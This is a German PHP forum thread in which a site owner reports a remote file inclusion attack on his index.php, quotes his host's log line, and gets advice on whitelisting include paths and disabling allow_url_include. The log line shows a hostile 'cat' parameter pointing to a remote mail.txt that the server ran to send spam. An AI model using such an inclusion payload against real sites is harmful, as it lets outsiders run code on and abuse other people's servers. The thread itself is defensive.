"Mailhack" meines Webspace

kepi · 26.09.2010, 11:37

hey,

ich bin durch meinen webspace provider auf folgendes aufmerksam gemacht worden:
-----------------------------------
wie wir soeben bei Wartungsarbeiten am Server festgestellen mussten, wird über Ihren Kundenaccount eine stark erhöhte Anzahl von E-Mails mittels eines PHP-Scripts versendet.

das Problem ist eine Sicherheitslücke in Ihrer index.php. Über diese kann Code von extern per URL eingeschleust und auf dem Server ausgeführt werden.

Folgender Logfileauszug belegt dies:

92.60.18.223 - - [21/Sep/2010:16:00:48 +0200] "POST /index.php?cat=http://balanceofnaturewholesale.com//mail.txt??? HTTP/1.1" 200 5777 "http://meineseite.com/index.php?cat=http://balanceofnaturewholesale.com//mail.txt???" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13"

Hier wurde Code von http://balanceofnaturewholesale.com//mail.txt eingeschleust und der Mailversand gestartet.
------------------------

auf der index.php befindet sich genau ein mail-befehl, nämlich dann, wenn sich ein neuer benutzer auf der seite registriert. es wird im anschluss ein bestätigungsemail geschickt und damit hat sichs. ist das problem gelöst, wenn ich auf dieses mail verzichte? oder liegt das ganze problem eher beim webspace anbieter, dessen sicherheitssystem zu einfach zu umgehen ist?

danke gleich mal fürs helfen.

lg,
andreas

kepi · 26.09.2010, 11:42

ah ich bin ein trottel .. jetzt les ich das zum ersten mal gscheid.
vergesst das ganze

kepi · 26.09.2010, 11:57

bzw. noch mal zur sicherheit ... ich habe jetzt einfach gesagt:

PHP-Code:

  if($_GET['cat']=="kategorie1" OR $_GET['cat']=="kategorie2" OR $_GET['cat']=="kategorie3") {
include ($_GET['cat'].".php"); 
}

das reicht doch oder?

Manko10 · 26.09.2010, 12:05

Eine Möglichkeit.
Den Pfad für Includes aus externen Daten zusammenzusetzen, ist aber immer gefährlich. Mich wundert allerdings, dass dein Hoster allow_url_include aktiviert hat.

mquadrat · 27.09.2010, 14:40

Ja, eine White-List für includes passt schon.

Ggf. möchtest du dir die Top10 der Sicherheitslücken anschauen, da steht das auch drin. Müsste sich bei der OWASP finden.

27.09.2010, 20:08

Wie schon die User über mir sagten: Entweder eine White-List, oder du filterst den String der dir $_GET zurück gibt!.

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Thema bewerten
Thema bewerten:

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Biete Webspace mit Domain auf schnellem Server zu Duping-Preis an!	75MrCoolBoy	Off-Topic Diskussionen	9	07.02.2010 22:16
Suche geeignete Webspace	Mr.Karl	Server, Hosting und Workstations	8	12.10.2008 16:40
script funktioniert bei webspace1 - bei webspace 2 NICHT - weiss jemand warum?	lupoloop	PHP Tipps 2008	7	10.10.2008 08:11
Free Webspace Service?	Zangelo	PHP Tipps 2005-2	4	16.10.2005 12:46
Großes Problem mit neuem Webspace	El Barto	PHP-Fortgeschrittene	8	29.12.2004 16:59
Webspace -> vServer oder rootserver	robo47	Off-Topic Diskussionen	25	14.12.2004 11:14
Webspace verwalten		PHP Tipps 2004	10	28.10.2004 14:25
Passwortschutz für meinen Webspace.		Beitragsarchiv	2	24.10.2004 20:33
PHP Gästebuch läßt auf neuem Webspace keine Einträge zu		PHP Tipps 2004	5	12.10.2004 06:47
Webspace Problem	Anuschka	PHP Tipps 2004	1	09.08.2004 13:51
php + mysql - webspace ...	Tschuu	PHP Tipps 2004	4	19.06.2004 18:52

26.09.2010, 11:37
kepi Neuer Benutzer Registriert seit: 26.09.2010 Beiträge: 3 PHP-Kenntnisse: Fortgeschritten	"Mailhack" meines Webspace hey, ich bin durch meinen webspace provider auf folgendes aufmerksam gemacht worden: ----------------------------------- wie wir soeben bei Wartungsarbeiten am Server festgestellen mussten, wird über Ihren Kundenaccount eine stark erhöhte Anzahl von E-Mails mittels eines PHP-Scripts versendet. das Problem ist eine Sicherheitslücke in Ihrer index.php. Über diese kann Code von extern per URL eingeschleust und auf dem Server ausgeführt werden. Folgender Logfileauszug belegt dies: 92.60.18.223 - - [21/Sep/2010:16:00:48 +0200] "POST /index.php?cat=http://balanceofnaturewholesale.com//mail.txt??? HTTP/1.1" 200 5777 "http://meineseite.com/index.php?cat=http://balanceofnaturewholesale.com//mail.txt???" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13" Hier wurde Code von http://balanceofnaturewholesale.com//mail.txt eingeschleust und der Mailversand gestartet. ------------------------ auf der index.php befindet sich genau ein mail-befehl, nämlich dann, wenn sich ein neuer benutzer auf der seite registriert. es wird im anschluss ein bestätigungsemail geschickt und damit hat sichs. ist das problem gelöst, wenn ich auf dieses mail verzichte? oder liegt das ganze problem eher beim webspace anbieter, dessen sicherheitssystem zu einfach zu umgehen ist? danke gleich mal fürs helfen. lg, andreas


Mister Ad PHP Code Flüsterer Registriert seit: 21.08.2005 Beiträge: 4682 PHP-Kenntnisse: Fortgeschritten

26.09.2010, 11:42
kepi Neuer Benutzer Registriert seit: 26.09.2010 Beiträge: 3 PHP-Kenntnisse: Fortgeschritten	ah ich bin ein trottel .. jetzt les ich das zum ersten mal gscheid. vergesst das ganze

26.09.2010, 11:57
kepi Neuer Benutzer Registriert seit: 26.09.2010 Beiträge: 3 PHP-Kenntnisse: Fortgeschritten	bzw. noch mal zur sicherheit ... ich habe jetzt einfach gesagt: PHP-Code: `if($_GET['cat']=="kategorie1" OR $_GET['cat']=="kategorie2" OR $_GET['cat']=="kategorie3") { include ($_GET['cat'].".php"); }` das reicht doch oder?

26.09.2010, 12:05
Manko10 Supermoderator HD Registriert seit: 16.03.2008 Beiträge: 8.706 PHP-Kenntnisse: Fortgeschritten	Eine Möglichkeit. Den Pfad für Includes aus externen Daten zusammenzusetzen, ist aber immer gefährlich. Mich wundert allerdings, dass dein Hoster allow_url_include aktiviert hat. __________________ Refining Linux Advent Calendar series “24 Outstanding ZSH Gems” Geändert von Manko10 (26.09.2010 um 12:08 Uhr).

27.09.2010, 14:40
mquadrat Erfahrener Benutzer Registriert seit: 02.09.2009 Beiträge: 1.019 PHP-Kenntnisse: Fortgeschritten	Ja, eine White-List für includes passt schon. Ggf. möchtest du dir die Top10 der Sicherheitslücken anschauen, da steht das auch drin. Müsste sich bei der OWASP finden. __________________ Wir suchen PHP Entwickler (Vollzeit) im Raum Darmstadt / Rhein-Main. Infos via E-Mail mueller@new-frontiers.de

27.09.2010, 20:08
Jens P. Gast Beiträge: n/a	Wie schon die User über mir sagten: Entweder eine White-List, oder du filterst den String der dir $_GET zurück gibt!.